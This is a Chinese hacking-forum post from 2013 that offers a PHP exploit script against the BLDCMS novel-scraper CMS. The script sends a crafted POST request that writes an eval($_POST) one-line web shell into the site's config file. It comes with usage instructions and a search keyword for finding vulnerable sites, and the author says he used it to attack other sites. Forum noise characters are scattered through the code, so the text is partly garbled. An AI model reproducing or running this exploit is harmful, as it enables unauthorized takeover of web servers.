找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2646|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
1 [1 N7 o" H- U! s: O9 t% u/ \" @/ W2 I( k2 K+ l

( g( M/ U0 o+ }9 t$ [5 F0 r9 `话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
; x; Z! K: w; V2 b+ S( T% X & X( H6 G. x5 D  c" ?# V6 D
既然都有人发了 我就把我之前写好的EXP放出来吧
& P. c  Q: @* V( i' k $ ]$ p2 ?4 j0 i+ c7 M) D
view source print?01.php;">9 w5 _0 Y4 y' ]" R0 T. Q) M9 `
02.<!--?php* S' y- i7 `. @5 ?8 Z* W
03.echo "-------------------------------------------------------------------% o2 v% `' G$ G8 \* Z+ {5 P
04. 3 s& u+ n9 S: T+ o$ L
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP; `& C# l& b3 D
06. " M- s* z' r! y0 v5 F1 A, c
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
: m6 @1 B+ q) H- L/ P9 |, }  @( j8 ~08.
2 ]2 q! R7 |+ i  `% u6 K& Z09.QQ:981009941\r\n                                2013.3.21\r\n             & h! E! G/ \9 @* l
10.
' @: _- u% H6 e11.
! C4 e' _% Z' @# G& F12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码" P& T; d5 l( ?8 I  p, y
13.
7 O- P; c2 ]: L8 \7 O14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 {$ a9 u8 t6 F, _+ ~: M15.
+ n; k0 g7 o# t3 [; P" C4 |16.--------------------------------------------------------------------\r\n";
' d/ `3 H5 G, y" q17.$url=$argv[1];
; ]/ Q& _0 B2 O( B3 X; v; ~- O18.$dir=$argv[2];, R7 T, G! X& m
19.$pass=$argv[3];
, w- y: n( W6 Q0 q3 d! z, l( }20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';5 }4 t0 `0 p9 I! u' _  s
21.if (emptyempty($pass)||emptyempty($url))
: Y: a1 G8 ?  \0 T- r2 `1 c! j22.{exit("请输入参数");}+ F" }+ B# g+ ^* @9 ]- k2 W
23.else4 j2 O# h$ m- W: @8 [7 e8 W( f
24.{
+ X& L5 y9 Y8 h8 `% b- i25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev1 l% k" ?' U1 Q0 m; y1 q
26. 5 E2 O# K. A( D3 R  l
27.al;
6 \, C9 ]5 n8 j+ H% c28.$length = strlen($fuckdata);
/ @+ V! q0 e+ x29.function getshell($url,$pass)* h! V) n1 z5 I  x$ ]
30.{6 q* ?# f3 i; e  B) ?* r. D
31.global $url,$dir,$pass,$eval,$length,$fuckdata;, \) J/ b% D5 V# G
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";: M& W! G( H) Q/ V  J: d
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";) `5 v, ~" P! @: k! f2 T
34.$header .= "User-Agent: MSIE\r\n";" e/ M5 x& e4 `7 ?' s8 s: c0 F
35.$header .= "Host:".$url."\r\n";
; ~# E. S6 n' C. Z36.$header .= "Content-Length: ".$length."\r\n";
* V& C& z9 r6 ]- I! [37.$header .= "Connection: Close\r\n";5 t7 t& [# {9 {' w4 ^
38.$header .="\r\n";
2 ^0 M( Q5 G( R: W. Z39.$header .= $fuckdata."\r\n\r\n";
, n' K" x. w, g9 P. G( y40.$fp = fsockopen($url, 80,$errno,$errstr,15);' q5 G! ?, o" F
41.if (!$fp)
+ H( I( J& T% X  C% {. b0 y" H# P, X5 F42.{2 q. O1 b$ o  ~' x7 F
43.exit ("利用失败:请检查指定目标是否能正常打开");, u5 ]- d  p) J% v
44.}
2 ?( k1 v6 v+ J6 g4 x45.else{ if (!fputs($fp,$header))
+ e, [- o* q, O+ B# f46.{exit ("利用失败");}
1 c/ @3 E+ j) H47.else
  v6 g7 U2 g# o( F48.{
+ ~# u% i# Z0 I& \( |2 l49.$receive = '';8 T. `" G) R5 m' k% A0 X' Q
50.while (!feof($fp)) {4 }2 E8 J' o# b6 E: a
51.$receive .= @fgets($fp, 1000);( i. m. p* `- f* |
52.}& p" O# t8 x1 c$ X" Q+ d+ I2 P
53.@fclose($fp);  U  E) C) |- p4 z0 _8 `+ @2 B
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标# z) ?, u& O6 i' W
55.
/ [/ j. A) c' z56.GPC是否=off)";! c: C' D' S$ Y* J5 i0 x
57.}}
. J# y4 s  Y! s- x; [58.}+ W& _0 _* L, |
59.}
2 \( ^: d1 C- \! A% e# h# T+ V60.getshell($url,$pass);: P9 ?; L+ x1 d8 ], K4 f
61.?-->6 a7 W4 c: d* L+ b/ F' z; W

. f+ e( e: L, {1 h$ f3 [# p6 C' S0 e2 s$ W/ C: E. u3 N& L
$ J% G- h# P: V
by 数据流8 G3 i0 c8 D) j" q1 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表